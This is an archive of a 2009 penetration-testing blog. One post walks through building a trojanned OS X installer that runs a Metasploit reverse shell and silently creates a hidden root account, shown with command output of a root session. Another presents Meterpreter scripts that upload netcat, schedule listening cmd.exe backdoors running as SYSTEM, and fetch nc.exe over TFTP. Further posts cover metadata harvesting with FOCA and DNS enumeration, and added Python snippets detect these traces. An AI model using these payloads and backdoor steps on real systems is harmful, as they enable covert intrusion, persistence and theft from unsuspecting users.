
Entries from April 1, 2009 - April 30, 2009

Saturday, April 25, 2009

Evil Packaging on OSX with Xcode and Metasploit

Mubix did a very good video at Room362 on packaging a Meterpreter payload with iexpress on Windows to create a trojanned Windows installer. I decided to give it a spin and make one for OS X. This kind of attack is perfect for many environments, since there is no patch for stupidity. Packaging an evil installer opens up many vectors for performing attacks: placing it on removable media and seeing who picks it up, or social engineering, to name a few.

OS X has a packager named Package Maker that is included with the Xcode development environment on the OS X DVD, or it can be downloaded from http://connect.apple.com. I highly recommend using the version downloaded from the webpage, since that will be the latest version for your Mac. Once the DMG file is downloaded and installed, the tools will be located in the root of your hard drive under Developer.

But before we create the package we must create our payload. For this example I will use a Metasploit reverse TCP shell for OS X and a script that creates an account with UID 0 for later attacks against the target machine. To generate the payload with the latest Metasploit development version we run the following command:

root@bt:/pentest/exploits/framework3# ./msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.1.103 X > osxexe
Created by msfpayload (http://www.metasploit.com).
Payload: osx/x86/shell_reverse_tcp
 Length: 65
Options: LHOST=192.168.1.103

Now we have an OS X x86 executable payload set to connect back to the attacker's machine, 192.168.1.103, on the default port of 4444. We will also create a post-installation script to launch our payload and create an account with UID 0. This gives us root privileges, and since the UID is below 500 the account will not show on the login screen. The script looks like this:

#!/bin/sh
# run backdoor (the package installs the payload into /usr/bin)
/usr/bin/osxexe &
# create user account "dark" with admin privs (UID 0, primary group 0)
dscl . -create /Users/dark
dscl . -create /Users/dark UserShell /bin/bash
dscl . -create /Users/dark RealName "Darkoperator"
dscl . -create /Users/dark UniqueID 0
dscl . -create /Users/dark PrimaryGroupID 0
dscl . -passwd /Users/dark P@55w0rd

This script launches the payload, which the package installs into /usr/bin on the target machine, and creates an account with username dark and password P@55w0rd. We now start Package Maker, located in the root of the system HD under Developer/Applications/Utilities, by double-clicking it. We should be greeted with a screen like this:

Picture 1

We enter the organization name we want to appear in the properties of the file and the minimum target OS version we want this package to run under.

Picture 2

Then we give the package a title, select that the installation be on the System Volume, and give it a description if we want.

Picture 3

Then, on the bottom left side of the window, we click on the plus sign and select our payload (if we wish we can also add an OS X app for cover). We set the destination path for the payload and make sure the Require Admin Authentication checkbox is selected, since we want our script and payload to be executed as root.

Picture 4

On the Contents tab we select the payload and set the proper permissions for it: Owner root, Group admin, and the execute bit set for owner and others.

Picture 5

In the Scripts tab we select the script directory where we placed our post-install script and select it as the postinstall script.

Picture 6

Now we click the Build button at the top left to build our pkg file. We place the file in a DMG on a share, on a USB stick, or anywhere else from which our target will execute the installer thinking it is a valid package.

We prepare our attacking machine in Metasploit to receive the shells that will come from executions of the trojanned package, and then we wait for the connections:

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD osx/x86/shell_reverse_tcp 
PAYLOAD => osx/x86/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.103 
LHOST => 192.168.1.103
msf exploit(handler) > set ExitOnSeesion false
ExitOnSeesion => false
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.103:4444 -> 192.168.1.120:58942)
id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff)
pwd
/
uname -a
Darwin carlos-perezs-computer.local 9.6.0 Darwin Kernel Version 9.6.0: Mon Nov 24 17:37:00 PST 2008; root:xnu-1228.9.59~1/RELEASE_I386 i386

As you can see, the shell is running under UID 0. This attack can be expanded further by scheduling the payload to run every minute, configuring and starting SSH or Remote Connection (VNC), and disabling the built-in firewall and Little Snitch if present, among many others.
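On the defender side, the two things this post leaves behind are a postinstall script with dscl calls and a second UID 0 account in Directory Services. The following added example (not code from the original post) checks for both: the first function scans the Scripts/postinstall of a package expanded with pkgutil --expand, the second audits a "name uid" account listing such as dscl . -list /Users UniqueID produces. Both inputs below are constructed samples.

```python
"""Added defender-side checks for the technique above (not from the original
post): scan a package postinstall script for dscl account creation / UID 0
grants, and audit a local account listing for extra UID 0 accounts."""
import re
from collections import defaultdict

# Constructed: a postinstall script shaped like the one in the post.
SAMPLE_POSTINSTALL = """#!/bin/sh
/usr/bin/osxexe &
dscl . -create /Users/dark
dscl . -create /Users/dark UserShell /bin/bash
dscl . -create /Users/dark UniqueID 0
dscl . -create /Users/dark PrimaryGroupID 0
dscl . -passwd /Users/dark P@55w0rd
"""

# Constructed: output in the shape of `dscl . -list /Users UniqueID`
# (one "<name> <uid>" pair per line).
SAMPLE_UID_LISTING = """_www 70
daemon 1
dark 0
nobody -2
root 0
carlos 501
"""

DSCL_CREATE = re.compile(r"dscl\s+\S+\s+-create\s+/Users/(\S+)(?:\s+(\S+)\s+(\S+))?")
DSCL_PASSWD = re.compile(r"dscl\s+\S+\s+-passwd\s+/Users/(\S+)")

def scan_postinstall(script):
    """Return (line number, finding) pairs for account-related dscl calls."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        m = DSCL_CREATE.search(line)
        if m:
            user, attr, value = m.groups()
            if attr is None:
                findings.append((lineno, f"creates local account {user}"))
            elif attr == "UniqueID":
                try:
                    uid = int(value)
                except ValueError:
                    uid = None
                if uid == 0:
                    findings.append((lineno, f"gives {user} UID 0 (root-equivalent)"))
                elif uid is not None and uid < 500:
                    # the post notes sub-500 UIDs are hidden from the login window
                    findings.append((lineno, f"gives {user} UID {uid} (hidden from login window)"))
            elif attr == "PrimaryGroupID" and value == "0":
                findings.append((lineno, f"puts {user} in group 0 (wheel)"))
        m = DSCL_PASSWD.search(line)
        if m:
            findings.append((lineno, f"sets a password for {m.group(1)} non-interactively"))
    return findings

def audit_uid_listing(listing):
    """Flag UID 0 accounts other than root and any UID shared by several accounts."""
    by_uid = defaultdict(list)
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) == 2:
            try:
                by_uid[int(parts[1])].append(parts[0])
            except ValueError:
                continue  # skip malformed lines
    alerts = []
    for name in by_uid.get(0, []):
        if name != "root":
            alerts.append(f"non-root account with UID 0: {name}")
    for uid, names in sorted(by_uid.items()):
        if len(names) > 1:
            alerts.append(f"UID {uid} shared by {', '.join(sorted(names))}")
    return alerts

if __name__ == "__main__":
    for lineno, msg in scan_postinstall(SAMPLE_POSTINSTALL):
        print(f"postinstall:{lineno}: {msg}")
    for alert in audit_uid_listing(SAMPLE_UID_LISTING):
        print("accounts:", alert)
```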

Thursday, April 23, 2009

Metadata Enumeration with FOCA

One very important part of any pentest is gathering information about the target network that will be attacked, and one area that is gaining a lot of traction is enumeration through metadata. I recently learned about a tool while listening to the great podcast Exotic Liability, where they mentioned the FOCA tool by Informatica64 when talking about their presentation at Blackhat Europe 09. You can either download the FOCA tool or use the webpage to submit your document for analysis. I prefer to do most of my analysis locally, since on almost all pentests I have conducted all information is confidential and sharing it with third parties is not permitted. This tool analyzes metadata from Microsoft Office documents, PDF files, OpenOffice files and WordPerfect files, as well as EXIF metadata from images. The best part is that you can add files you collected manually, or files found and downloaded through web searches using Google and Live Search, which makes it extremely flexible for pentests. It will enumerate users, folders, printers, emails and the version of the software used to create the file. The tool runs on Windows XP and Windows Vista; I found it to be really unstable on Windows 7 Beta.

After downloading, run the setup executable and the tool will be available in the Start menu under Programs. Once you execute the application you should see a screen like this one:

image

You can click Project -> New Project to start a new project, where you give the project name, the website to enumerate for documents, and a place to download and store the documents.

image

Alternatively, you can add a single file or a folder of files that you have gathered previously via email, social engineering or any other way by right-clicking in the document list area and choosing either the Add File or Add Folder option.

image

When you choose to create a new project, the screen changes as follows, giving you the option of which file types to download and which search engine to use.

image

But what if the file type you are looking for, like PNG or JPG, is not in the options? You can click on the Custom Search link and enter the Google query yourself, adding filetype:<extension> as shown in the image below.

image

For the following screenshots I will enumerate and download only doc files from Blackhat.com, so I hit Search and you can see the files that were found. Once it has finished you can right-click and download only specific files, or choose to download them all. Once downloaded, you can right-click again and choose to extract the metadata of a single file or of all the files.

image

Once it has finished extracting all the metadata you can look at it by clicking on the type, or go to Documents, select the document and click on it to get further information not classified under the given types, like EXIF data. Here I clicked on the Folders tab, and you can see I can identify usernames, locations, servers and paths on the network where these documents were created and stored; on some I have tested I was even able to enumerate SharePoint server structures.

image

This information can be exported to a text file by right-clicking on the attribute and choosing to export the data to a file. It can later be used to feed other tools or to gain information for further attacks, like finding types of printers that can be used to store files or be exploited since embedded device security tends to be low, or attacking shares by dropping Office documents with Meterpreter VBA shells or setting autorun.inf files to launch payloads or exploits on client PCs. The options are many.

I will definitely be adding this tool to my toolbox and making it part of my methodology when executing target enumeration during pentests. I hope you find this information useful, and special thanks to the Exotic Liability team for mentioning this tool.
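The fields FOCA harvests from Office documents (author, last editor, company, application version) live in plain XML inside the .docx zip, so a pre-publication review can read and blank them with the standard library. The following added example (not the post's or FOCA's code) builds a constructed .docx in memory, extracts those fields, and writes a scrubbed copy; the names jsmith and ACME Inc are made up.

```python
"""Added example (not from the original post, not FOCA's code): read and
scrub the core/app properties of a .docx that FOCA-style tools enumerate."""
import io
import xml.etree.ElementTree as ET
import zipfile

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)

# (zip member, element path) -> report label
FIELDS = {
    ("docProps/core.xml", "dc:creator"): "creator",
    ("docProps/core.xml", "cp:lastModifiedBy"): "last_modified_by",
    ("docProps/app.xml", "ep:Application"): "application",
    ("docProps/app.xml", "ep:AppVersion"): "app_version",
    ("docProps/app.xml", "ep:Company"): "company",
}

def build_sample_docx():
    """Constructed minimal .docx carrying the kind of metadata FOCA reports."""
    core = (f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
            "<dc:creator>jsmith</dc:creator>"
            "<cp:lastModifiedBy>ACMEINC\\jsmith</cp:lastModifiedBy>"
            "</cp:coreProperties>")
    app = (f'<Properties xmlns="{NS["ep"]}">'
           "<Application>Microsoft Office Word</Application>"
           "<AppVersion>12.0000</AppVersion>"
           "<Company>ACME Inc</Company></Properties>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
        z.writestr("word/document.xml", "<document/>")  # body is irrelevant here
    return buf.getvalue()

def extract_metadata(docx_bytes):
    """Return {label: value} for every field of interest present in the file."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        members = set(z.namelist())
        for (member, path), label in FIELDS.items():
            if member not in members:
                continue
            el = ET.fromstring(z.read(member)).find(path, NS)
            if el is not None and el.text:
                found[label] = el.text
    return found

def scrub_metadata(docx_bytes):
    """Return a copy of the document with the fields of interest blanked."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for member in src.namelist():
            data = src.read(member)
            paths = [p for (m, p) in FIELDS if m == member]
            if paths:  # only the property parts are rewritten
                root = ET.fromstring(data)
                for path in paths:
                    el = root.find(path, NS)
                    if el is not None:
                        el.text = ""
                data = ET.tostring(root)
            dst.writestr(member, data)
    return out.getvalue()

if __name__ == "__main__":
    sample = build_sample_docx()
    for label, value in extract_metadata(sample).items():
        print(f"{label}: {value}")
    print("after scrub:", extract_metadata(scrub_metadata(sample)))
```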

Saturday, April 11, 2009

Abusing the Scheduler with Meterpreter

Recently I had a chance to look at the presentation by Val Smith and Colin Ames given at Defcon 16, called Meta-Post Exploitation. In the presentation they talk about many post-exploitation techniques I already knew, as well as some new approaches to others. Among the tools demoed, the ones that caught my attention were MassWinenum and AtAbuse. I quickly modified my Remotewinenum script to support multiple targets, quite an easy task since most of the work was already done; the only difference is that I use WMIC to achieve this. I like to be as stealthy as possible and use the built-in tools as much as I can to my advantage. Here is a sample execution of the script:

meterpreter > run remotewinenum -t 192.168.1.7,192.168.1.8
[*] Running Enumeration against 192.168.1.7
[*] Saving report to /home/carlos/.msf3/logs/remotewinenum/192.168.1.7_20090410.0206
[*] Running WMIC Commands ....
[*] running command wimic environment list
[*] running command wimic share list
[*] running command wimic nicconfig list
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group list
[*] running command wimic sysaccount list
[*] running command wimic volume list brief
[*] running command wimic logicaldisk get description,filesystem,name,size
[*] running command wimic netlogin get name,lastlogon,badpasswordcount
[*] running command wimic netclient list brief
[*] running command wimic netuse get name,username,connectiontype,localname
[*] running command wimic share get name,path
[*] running command wimic nteventlog get path,filename,writeable
[*] running command wimic service list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic rdtoggle list
[*] running command wimic product get name,version
[*] running command wimic qfe list
[*] Running Enumeration against 192.168.1.8
[*] Saving report to /home/carlos/.msf3/logs/remotewinenum/192.168.1.8_20090410.0206
[*] Running WMIC Commands ....
[*] running command wimic environment list
[*] running command wimic share list
[*] running command wimic nicconfig list
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group list
[*] running command wimic sysaccount list
[*] running command wimic volume list brief
[*] running command wimic logicaldisk get description,filesystem,name,size
[*] running command wimic netlogin get name,lastlogon,badpasswordcount
[*] running command wimic netclient list brief
[*] running command wimic netuse get name,username,connectiontype,localname
[*] running command wimic share get name,path
[*] running command wimic nteventlog get path,filename,writeable
[*] running command wimic service list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic rdtoggle list
[*] running command wimic product get name,version
[*] running command wimic qfe list
meterpreter >

As can be seen, a comma-separated target list can now be provided, and the tool will execute either under the privileges Meterpreter is running with or with a username and password provided. Each host's report is saved in a different file and location for later analysis.

The tool that drew most of my attention was AtAbuser, since its concept is extremely simple. For a long time I had been using the scheduler to schedule backdoors and for privilege escalation, but Val Smith's tool used it for remote command execution, and since the privileges it runs under are System this makes it a very powerful tool. As indicated in the talk, the Scheduler service is one that is overlooked by many when hardening their servers. A set of tools came from this; the first one I call Scheduleme, which assists in scheduling tasks on a local or remote target.

meterpreter > run scheduleme 
Scheduleme Meterpreter Script
This script provides most common scheduling types used during a pentest.
It has the functionality to upload a desired executable or script and schedule
the file uploaded. All scheduled task are as System so Meterpreter process must
be System or local admin for local schedules and Administrator for remore shcedules
-h Help menu.
-c <opt> Command to execute at the given time. If options for execution needed use double quotes
-d Daily.
-hr <opt> Every specified hours 1-23.
-m <opt> Every specified amount of minutes 1-1439
-l When a user logs on.
-s At system startup.
-i Run command imediatly and only once.
-r Remote Schedule. Executable has to be already on remote target
-e <opt> Executable or script to upload to target host, will not work with remote schedule
-o <opt> Options for executable when upload method used
-u Username of account with administrative privelages.
-p Password for account provided.
-t <opt> Remote system to schedule job.
meterpreter >

It also has the capability of uploading an executable and scheduling it on the target under which the Meterpreter session is running. The options for scheduling are:

  • Hourly
  • Minutes
  • At user logon
  • At system startup
  • Immediately

The script will run either at the privilege level under which Meterpreter is running or under the credentials provided, both for local and remote execution. I recently used this script in a pentest where I was able to gain access to a Windows 2008 server, but due to the protections in Windows 2008 I could not dump the hashes even as Administrator, so I scheduled a second Meterpreter payload to run immediately, and since the schedules are executed as System I was able to dump the hashes. The uploaded files are stored in the directory given by the %TEMP% environment variable and receive a random name.

Setting a Netcat backdoor: the first example uploads the file and sets the backdoor, the second is for the case where the file already exists on the target machine:

meterpreter > run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
[*] Uploadingd /tmp/nc.exe....
[*] /tmp/nc.exe uploaded!
[*] Scheduling command C:\DOCUME~1\labuser\LOCALS~1\
Temp\svhost46.exe -e cmd.exe -L -p 8080 to run minute.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck93 /F

meterpreter > run scheduleme -m 1 -c "C:\DOCUME~1\labuser\LOCALS~1\Temp\svhost46.exe -e cmd.exe -L -p 8088"
[*] Scheduling command C:DOCUME~1labuserLOCALS~1Tempsvhost46.exe -e cmd.exe -L -p 8088 to run minute.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck47 /F

The other script, which acts more like the AtAbuser script that Val Smith demoed in his talk, is Schtasksabuse. As the name implies, it uses the schtasks command instead of AT, mainly for flexibility; that flexibility makes it a more complex command to use in a shell but perfect for scripting. The script takes a comma-separated list of commands and executes each one by scheduling a task, running the task immediately, waiting a specified time, and then deleting the task. Just like the other scripts, it will use the privileges of the process under which Meterpreter is running, or credentials can be provided. All commands are executed under the context of System on the target box, making this a very powerful tool under the right circumstances.

meterpreter > run schtasksabuse 
Meterpreter session running as ACMEINC\Administrator
This Meterpreter script is for running commands on targets system using the
Windows Scheduler, it is based on the tool presented but not released by Val Smith
in Defcon 16 ATAbuser. If no user and password is given it will use the permissions
of the process Meterpreter is running under.
Options:

OPTIONS:

-c <opt> Commands to execute. Several command can be given but separated by commas and enclose the list in doble quotes if arguments are used.
-d <opt> Delay between the execution of commands in seconds, default is 2 seconds if not given.
-h Help menu.
-p <opt> Password for user account specified, it must be given if a user is given.
-t <opt> Remote system to schedule job.
-u <opt> Username to schedule task, if none is given the current user credentials will be used.

An example run that downloads Netcat via TFTP and then runs it as a backdoor:

meterpreter > run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
Meterpreter session running as ACMEINC\Administrator
[*] Scheduling command tftp -i 192.168.1.8 GET nc.exe to run .....
[*] The scheduled task has been successfully created
[*] Running command on 192.168.1.7
[*] Removing scheduled task
[*] Scheduling command nc -L -p 8080 -e cmd.exe to run .....
[*] The scheduled task has been successfully created
[*] Running command on 192.168.1.7
[*] Removing scheduled task
meterpreter >

This can be used to start services, upload payloads, run fgdump or any other set of tools or commands.

I hope these tools are helpful; all feedback is welcome. I will submit these tools to the Metasploit project for approval to be committed into the current development branch.
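The runs above leave recognizable traces in the task list: a task running as SYSTEM, repeating every minute or fired immediately, pointing at a binary under a Temp directory with a name made to look like svchost, under a generated-looking name such as syscheck93. The following added example (not the post's or the scripts' own code) triages rows from schtasks /query /v /fo csv on those traits; the CSV is constructed to the shape of that output and only the named columns are relied on, since the real output carries many more.

```python
"""Added example (not from the original post): triage `schtasks /query /v
/fo csv` rows for the traits a scheduleme/schtasksabuse run leaves behind."""
import csv
import io
import re

# Constructed sample in the shape of the schtasks CSV output (columns trimmed).
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type","Repeat: Every"
"LAB1","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM","Weekly","N/A"
"LAB1","\syscheck93","C:\DOCUME~1\labuser\LOCALS~1\Temp\svhost46.exe -e cmd.exe -L -p 8080","SYSTEM","Minute","0:01:00"
"LAB1","\Backup","C:\Tools\backup.exe","LAB1\backupsvc","Daily","N/A"
"LAB1","\Adobe Updater","C:\Program Files\Adobe\updater.exe","labuser","Daily","N/A"
'''

TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.I)
# near-misses of svchost.exe; the genuine name does not match any alternative
LOOKALIKE = re.compile(r"\\(svhost|svch0st|scvhost)\w*\.exe", re.I)
GENERATED_NAME = re.compile(r"\\?[a-z]+\d{2,3}", re.I)

def score_task(row):
    """Return the reasons a task row deserves a look (empty list = not flagged)."""
    reasons = []
    cmd = row.get("Task To Run", "")
    if row.get("Run As User", "").upper() in ("SYSTEM", "NT AUTHORITY\\SYSTEM"):
        reasons.append("runs as SYSTEM")
    if row.get("Schedule Type", "") == "Minute" or row.get("Repeat: Every", "") == "0:01:00":
        reasons.append("repeats every minute")
    if TEMP_DIR.search(cmd):
        reasons.append("executable in a Temp directory")
    if LOOKALIKE.search(cmd):
        reasons.append("binary name mimics a system process")
    if GENERATED_NAME.fullmatch(row.get("TaskName", "")):
        reasons.append("generated-looking task name")
    # a SYSTEM task on its own is normal; require a second indicator to flag
    return reasons if len(reasons) >= 2 else []

def triage(csv_text):
    """Map each suspicious task name to the reasons it was flagged."""
    hits = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = score_task(row)
        if reasons:
            hits[row["TaskName"]] = reasons
    return hits

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_CSV).items():
        print(f"{name}: {'; '.join(reasons)}")
```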

Thursday, April 9, 2009

Virtualization changes the rules

One of the areas I have seen growing in most of the datacenters I have had a chance to consult in is virtualization. Many companies and government agencies are looking at virtualization to reduce their operational costs and at the same time gain some of its advantages, but one area that virtualization vendors and most system integrators are overlooking is how virtualization changes the way networks are designed and how it also changes the processes of the security team. The biggest mistake I have seen is the mixing of environments without doing a proper risk assessment and segmenting environments appropriately. You can see this in:

  • Mixing VDI machines (High Risk users have control!!) with server machines (Here is most of the data you want secured).
  • Having DMZ server and Internal server on a same Hypervisor Cluster.
  • Having the Lab Environment and production environments mixed on a same group of clusters.

These are only some basic examples. There is currently development and research being done by the bad guys on how to do VM escapes and gain access to the physical host; all major vendors have released patches for this, and still you do not see questions about it in any of the major risk assessment companies' guides out there. Another area that is grossly overlooked is how you design your network and storage infrastructure: where do you put your IDS/IPS boxes? How do you segment traffic? In fact, one of the major buzzwords is converged networks, where you have FCoE, iSCSI and NFS running on the same network that carries your Ethernet communication packets, so if a box or a piece of network equipment is compromised and the attacker can sniff or perform a MITM attack, he can see not only the network traffic but the storage traffic, gaining a far greater amount of access to the data. Many designs are badly done: not only do they not segregate which physical set of servers will host which VMs, but they have LUNs in the SAN where machines are mixed, so if an attacker gains access to the physical server he can also reach VMs of different classification levels.

Another great area of change many times overlooked is procedures, and in an IT environment there are plenty:

  • Backup procedures.
  • Change Management and Patch Management.
  • Incident Response

and these are only a few of the procedures that must be modified when moving into a virtual environment. Management as a whole changes: the admins of the physical servers have the power to change and control the VMs in that environment, permissions will vary to grant the necessary access to the right people to manage the resources, and the management system becomes one of the biggest areas of risk if not secured properly. There must be a separation of the management network, just like we separate the network and storage traffic. Also, the management hosts must be hardened and all necessary precautions taken, like having IPS monitoring the traffic to these systems, having proper logging set up, having HIPS on these boxes and proper change management, since a compromise of one of these boxes means the attacker has gained the keys to the kingdom. This is just a rant on some of the main points that I see are not being addressed properly by the major virtualization vendors when they talk about virtualization and consolidation. The bad guys are doing their research, and they even have attack code that will detect if the target is a VM; we had better catch up before it is too late.

Friday, April 3, 2009

DNS Recon Tool written in Ruby

I wrote this tool back in late 2006 and it has been my favorite tool for enumeration through DNS, in great part because I wrote it and it gives the output in a way that I can manipulate in my own style. One of the features I use the most, and which has given me excellent results, is SRV record enumeration. The script will perform the following:

  • Standard Record Enumeration for a given domain (A, NS, SOA and MX).
  • Top Level Domain expansion for a given domain.
  • Zone Transfer against all NS records of a given domain.
  • Reverse Lookup against a given IP Range given a start and end IP.
  • SRV Record enumeration, enumerating:
    • _gc._tcp.
    • _kerberos._tcp.
    • _kerberos._udp.
    • _ldap._tcp.
    • _test._tcp.
    • _sips._tcp.
    • _sip._udp.
    • _sip._tcp.
    • _aix._tcp.
    • _finger._tcp.
    • _ftp._tcp.
    • _http._tcp.
    • _nntp._tcp.
    • _telnet._tcp.
    • _whois._tcp.
    • _h323cs._tcp.
    • _h323cs._udp.
    • _h323be._tcp.
    • _h323be._udp.
    • _h323ls._tcp.
    • _h323ls._udp.
  • Brute force hostnames and subdomains of a given target domain using a wordlist.

To install the necessary Ruby dependencies using RubyGems, run the following commands as root:

gem install pNet-DNS
gem install ip


The script can be downloaded from dnsrecon.rb

I do hope that others find it as useful as I have; this tool will be included in BT4, among others of the tools I have discussed in this blog.

Help Screen of the script:

root@bt:~# ./dnsrecon.rb

Dnsrecon 1.6
By Carlos Perez
Email: carlos_perez[at]darkoperator.com

This is a simple tool written for target enumeration during authorized penetration test
engagements. This tool provides different methods for enumerating targets thru DNS service.

-t, --type
                Select the type of enumeration to be done.
                std     Query for SOA, NS and MX Record of a target domain.
                tld     Top Level Domain enumeration of a target domain.
                axf     Perform a Zone transfer against all NS server Records
                        of a target domain.
                rvs     Reverse Record Lookup enumeration against a targeted
                        IP range.
                srv     Service Record Enumeration of VOIP, Active Directory and
                        Network Services service records.
                brt     Bruteforce subdomain and host records using a wordlist.

-d, --target
                Domain to be targeted for enumeration.

-i, --ip
                Starting IP and end IP for a range to be used for reverse lookup
                enumeration of a targeted domain. Exmpl. 192.168.1.1,192.168.1.253

-w, --wordlist
                Wordlist to be use for brutforce enumeration of host names and subdomains.

-s, --dns
                Alternate DNS server to use.
-h, --help
                This help message.


Here is an example of the tool enumerating SRV records and standard records.

root@bt:~# ./dnsrecon.rb -t srv -d avaya.com
_sip._udp.avaya.com,198.152.17.90,5060
_sip._tcp.avaya.com,198.152.17.90,5060

root@bt:~# ./dnsrecon.rb -t std -d google.com
google.com,209.85.171.100,A
google.com,74.125.67.100,A
google.com,74.125.45.100,A
ns1.google.com,216.239.32.10,SOA
ns4.google.com,216.239.38.10,NS
ns1.google.com,216.239.32.10,NS
ns2.google.com,216.239.34.10,NS
ns3.google.com,216.239.36.10,NS
smtp4.google.com,72.14.221.25,MX,10
smtp1.google.com,209.85.237.25,MX,10
smtp2.google.com,64.233.165.25,MX,10
smtp3.google.com,209.85.137.25,MX,10